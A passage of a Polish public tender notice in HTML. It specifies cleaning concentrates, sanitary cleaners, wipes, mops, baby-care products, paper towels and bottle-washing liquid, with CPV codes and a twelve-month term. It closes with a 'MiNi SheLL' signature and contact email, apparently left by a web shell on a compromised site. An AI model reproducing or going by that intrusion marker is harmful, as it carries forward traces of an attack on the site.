2.Koncentrat do wszystkich zmywalnych powierzchni takich jak: szkło, marmur, emalia, plastik, drewno. Pozostawiający długotrwały, świeży zapach, nie pozostawiający smug . Zawierający anionowe związki powierzchniowo czynne, etoksylowany alkohol tłuszczowy 1-2%, substancje zapachowe, alkiloeterosiarczany 1-2%, ph koncentratu 6,9- 7,1 ,w kolorze  niebieskim, stężenie 0,5 - 2 %, opakowanie o pojemności 1000 ml - 50 litrów<br>

3.Koncentrat do wszystkich powierzchni odpornych na działanie kwasów, posiadający doskonałe właściwości w usuwaniu kamienia, osadów wapniowych i wszelkich zabrudzeń z powierzchni sanitarnych, pozostawiający długotrwały i świeży zapach. Nie uszkadzający czyszczonych powierzchni. Zawierający niejonowe związki powierzchniowo czynne, kwas amidosiarkowy 5-10%, etoksylowany alkohol tłuszczowy 2-5 %, substancje zapachowe, pH koncentratu 0,4-0,6, kolor czerwony, stężenie 0,5-2%, opakowanie o pojemności 1000 ml - 50 litrów<br>

4.Płyn do czyszczenia sanitariatów w opakowaniu o pojemności  
0,6 -0,8 l umożliwiającym bezpośrednie dozowanie, pH  0,5 do 0,6 zawierający kwas fosforowy 5-15%,  gęstość 20o 0,98-1,02g/ml, opakowanie o pojemności 
0,6 - 0,8 L -200 litrów<br>.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 4 - ścierki jedno i wielorazowego użytku, mopy, pianki i oliwki 
                           do mycia niemowląt<br>

1.Ścierki jednorazowe w kolorze białym o wymiarach 32x39 cm, pakowane po 50 - 100 sztuk - 12200 szt.<br>

2.Ścierki wielorazowego i długotrwałego  użycia przeznaczone do mycia i dezynfekcji powierzchni przeznaczone do wielokrotnego prania minimum 300 prań w temperaturze 60°C.Wykonane z mieszanki poliestru 70% i poliamidu 30%. o dużej chłonności wody o wymiarach 40 x 40 cm.  w kolorach:czerwony - 110szt., niebieski - 180szt., żółty  - 180szt<br>

3.Mopy do wielorazowego użytku  i wielokrotnego prania (minimum 350 prań), odporne na działanie preparatów dezynfekcyjnych. Wykonane z bawełny, ze specjalnym zaczepem umożliwiającym mycie (bezdotykowe), pędzelkowo cięty, tkany, nie przeszywany o wymiarach 40 x13 - 14 cm. Temperatura prania minimum 95 °C.-200szt<br>

4.Pianka do mycia niemowląt z możliwością stosowania u noworodków . Opakowanie dostosowane do systemu  typu Dermados (dotyczy opakowań 400 ml), będących w posiadaniu zamawiającego.Opakowanie 200ml -120 szt, Opakowanie 400 ml -70 szt<br>

5.Oliwka  dla niemowląt 200 ml -200 szt<br>.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.42.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie Nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 5 -ręczniki papierowe<br>

1.Ręczniki do wycierania rąk,  papierowe w rolce, białe bez perforacji, wykonane z włókien przetworzonych minimum 60 % i pierwotnych maksymalnie 40%. Jaskrawość - białość od 70 - 75 %, metoda wybielania bez zawartości chloru. Długość rolki od 164 - 170 m, szerokość 20 cm, średnica całkowita rolki 150 mm. Podstawowa waga nie mniejsza niż 30g/m2, wykonana w jednej warstwie -500 szt<br>.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.76.30.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie Nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 6 -płyny do mycia butelek i smoczków dla dzieci<br>

1.Płyn do mycia butelek, smoczków bezpieczny dla dziecka, usuwający białka mleka, substancje zagęszczające nie zawierający barwników ani wybielaczy, nieperfumowany, konstrukcja płynna, bezbarwny, ph neutralne dla skóry, zawierający naturalne enzymy: proteazy i mannanazy-butelka 0,5 l -300  l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com